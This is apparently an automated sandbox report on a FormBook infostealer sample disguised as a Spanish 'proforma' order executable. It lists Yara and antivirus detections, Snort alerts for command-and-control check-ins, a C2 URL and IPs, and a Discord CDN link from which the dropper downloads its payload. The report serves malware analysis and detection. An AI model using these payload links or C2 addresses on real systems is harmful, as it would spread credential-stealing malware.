Source: Yara match	File source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Contacts\Lxtcsmeg\Lxtcsmeg.exe

ReversingLabs: Detection: 50%

Source: 18.2.mobsync.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.logagent.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.mobsync.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.logagent.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.mobsync.exe.72480000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.mobsync.exe.72480000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.mobsync.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.mobsync.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.2.logagent.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.logagent.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.mobsync.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.mobsync.exe.72480000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.logagent.exe.72480000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.mobsync.exe.72480000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.mobsync.exe.72480000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: Se adjunta el pedido, proforma.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49764 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: mobsync.exe, cscript.exe

Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then pop ebx	5_2_72486AB4
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 4x nop then pop edi	5_2_72495676
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop ebx	12_2_003D6AB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4x nop then pop edi	12_2_003E5676

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 104.233.161.196:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 104.233.161.196:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 104.233.161.196:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 85.194.202.138:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 85.194.202.138:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 85.194.202.138:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.rematedeldia.com/euv4/

Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View	IP Address: 162.159.130.233 162.159.130.233

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: Se adjunta el pedido, proforma.exe, 00000000.00000003.665782531.00000000006F9000.00000004.00000001.sdmp, Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Se adjunta el pedido, proforma.exe, 00000000.00000003.665782531.00000000006F9000.00000004.00000001.sdmp, Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: Se adjunta el pedido, proforma.exe, 00000000.00000003.667080485.00000000006F9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxy

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/912979191073476678/Lxtcsmegwxhfqoabkjaduxyckamobho HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49764 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.802925802.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700532908.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.779255223.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775386122.0000000000C50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.mobsync.exe.72480000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.mobsync.exe.72480000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.726500145.000000000E234000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.783906150.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.700205465.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.797142151.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.797529980.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.783440695.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.797983718.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.782555506.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.946259387.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.782971513.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
